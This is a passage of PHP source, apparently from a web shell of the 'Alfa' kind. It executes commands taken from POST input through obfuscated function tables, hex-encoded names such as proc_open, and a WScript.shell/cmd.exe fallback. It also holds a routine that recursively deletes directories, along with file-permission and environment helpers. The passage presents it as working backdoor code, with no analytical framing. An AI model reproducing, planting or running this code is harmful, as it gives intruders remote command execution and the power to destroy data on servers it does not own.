fread($f, 1024); $GLOBALS['fungsi'][21]($f); } } elseif (function_exists("\x70\x72\x6f\x63\x5f\x6f\x70\x65\x6e")) { $pipes = array(); $process = @$GLOBALS['fungsi'][23]($in . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); $out = @$GLOBALS['fungsi'][22]($pipes[1]); } elseif (class_exists('COM')) { $alfaWs = new COM('WScript.shell'); $exec = $alfaWs->$GLOBALS['fungsi'][16]('cmd.exe /c ' . $_POST['alfa1']); $stdout = $exec->StdOut(); $out = $stdout->ReadAll(); } } catch (Exception $e) { } return $out; } function winpwd() { return str_replace("\\", "/", $GLOBALS['fungsi'][0]()); } function remove_slash($val) { $tex = str_replace("/", "", $val); $tex1 = str_replace(":", "", $tex); $tex2 = str_replace("_", "", $tex1); $tex3 = str_replace(" ", "", $tex2); $tex4 = str_replace(".", "", $tex3); return $tex4; } function getc() { $p = $GLOBALS['fungsi'][0](); $read = explode(":", $p); return $read[0]; } function check_xampp() { $mysql = getenv('MYSQL_HOME'); if (strstr($mysql, "xampp")) { return True; } else { return False; } } function unlinkDir($dir) { $dirs = array($dir); $files = array(); for ($i = 0;; $i++) { if (isset($dirs[$i])) $dir = $dirs[$i]; else break; if ($openDir = opendir($dir)) { while ($readDir = @readdir($openDir)) { if ($readDir != "." && $readDir != "..") { if ($GLOBALS['fungsi'][2]($dir . "/" . $readDir)) { $dirs[] = $dir . "/" . $readDir; } else { $files[] = $dir . "/" . $readDir; } } } } } foreach ($files as $file) { $GLOBALS['fungsi'][24]($file); } $dirs = array_reverse($dirs); foreach ($dirs as $dir) { $GLOBALS['fungsi'][25]($dir); } } function remove_dot($file) { $FILES = $file; $pch = explode(".", $FILES); return $pch[0]; } function perms($file) { $perms = $GLOBALS['fungsi'][6]($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>